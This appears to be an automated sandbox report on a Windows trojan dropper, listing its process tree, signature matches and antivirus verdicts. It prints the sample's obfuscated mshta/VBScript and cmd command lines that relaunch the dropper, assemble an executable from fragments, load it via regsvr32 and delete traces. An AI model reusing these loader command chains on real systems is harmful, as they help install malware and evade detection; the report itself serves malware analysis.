Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | June 24, 2021, 7:05 p.m. | June 24, 2021, 7:09 p.m. |
-
-
mshta.exe "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
4936-
cmd.exe "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
9076-
-
mshta.exe "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
3908-
cmd.exe "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
9168
-
-
mshta.exe "C:\Windows\System32\mshta.exe" vBscRiPT: ClOsE (creATEobJEct ("WScRipt.SHeLl" ). RUN ( "CmD.ExE /c EcHO | set /p = ""MZ"" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH + ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q * " ,0 , TrUe) )
4404-
cmd.exe "C:\Windows\System32\cmd.exe" /c EcHO | set /p = "MZ" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH+ ILDCx.kM + I5GP.~F+I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q *
2600-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" EcHO "
3684 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>5DNzNJQ.S"
6076 -
regsvr32.exe regsvr32 -S ..\0BSXD.7 -u
6460
-
-
-
-
taskkill.exe taskkill /F /iM "sfx_123_701.exe"
8548
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1848
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
172.217.25.14 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
pdb_path | D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb |
section | .gfids |
resource name | PNG |
file | C:\Users\test22\AppData\Local\Temp\p10.EXE |
cmdline | cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy" |
cmdline | "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) ) |
cmdline | msHTa vBscRiPT: ClOsE (creATEobJEct ("WScRipt.SHeLl" ). RUN ( "CmD.ExE /c EcHO | set /p = ""MZ"" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH + ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q * " ,0 , TrUe) ) |
cmdline | CmD.ExE /c EcHO | set /p = "MZ" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH+ ILDCx.kM + I5GP.~F+I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q * |
cmdline | "C:\Windows\System32\cmd.exe" /c EcHO | set /p = "MZ" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH+ ILDCx.kM + I5GP.~F+I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q * |
cmdline | msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) ) |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" EcHO " |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>5DNzNJQ.S" |
cmdline | regsvr32 -S ..\0BSXD.7 -u |
cmdline | "C:\Windows\System32\mshta.exe" vBscRiPT: ClOsE (creATEobJEct ("WScRipt.SHeLl" ). RUN ( "CmD.ExE /c EcHO | set /p = ""MZ"" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH + ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q * " ,0 , TrUe) ) |
cmdline | cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy" |
cmdline | "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) ) |
cmdline | "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy" |
cmdline | "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy" |
cmdline | msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) ) |
file | C:\Users\test22\AppData\Local\Temp\0BSXD.7 |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sfx_123_701.exe") |
url | http://www.microsoft.com/schemas/ie8tldlistdescription/1.0 |
url | http://purl.org/rss/1.0/ |
url | http://www.passport.com |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Hijack network configuration | rule | Hijack_Network | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API |
cmdline | cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy" |
cmdline | "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) ) |
cmdline | taskkill /F /iM "sfx_123_701.exe" |
cmdline | msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) ) |
cmdline | cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy" |
cmdline | "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) ) |
cmdline | "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy" |
cmdline | "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy" |
cmdline | msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) ) |
host | 172.217.25.14 |
Bkav | W32.AIDetect.malware1 |
Cynet | Malicious (score: 100) |
FireEye | Generic.mg.c8d1263386f7cb98 |
AegisLab | Trojan.Multi.Generic.4!c |
Sangfor | Trojan.Win32.Save.a |
BitDefender | Trojan.GenericKD.46534066 |
CrowdStrike | win/malicious_confidence_70% (W) |
Symantec | Trojan.Gen.2 |
APEX | Malicious |
Kaspersky | Trojan.Win32.Qshell.ffg |
MicroWorld-eScan | Trojan.GenericKD.46534066 |
SentinelOne | Static AI - Suspicious PE |
GData | Trojan.GenericKD.46534066 |
MAX | malware (ai score=83) |
Kingsoft | Win32.Troj.Generic_a.a.(kcloud) |
Microsoft | Trojan:Win32/Bunitucrypt.RW!MTB |
McAfee | Artemis!C8D1263386F7 |
Cylance | Unsafe |
Zoner | Probably Heur.RARAutorun |
Webroot | W32.Trojan.Gen |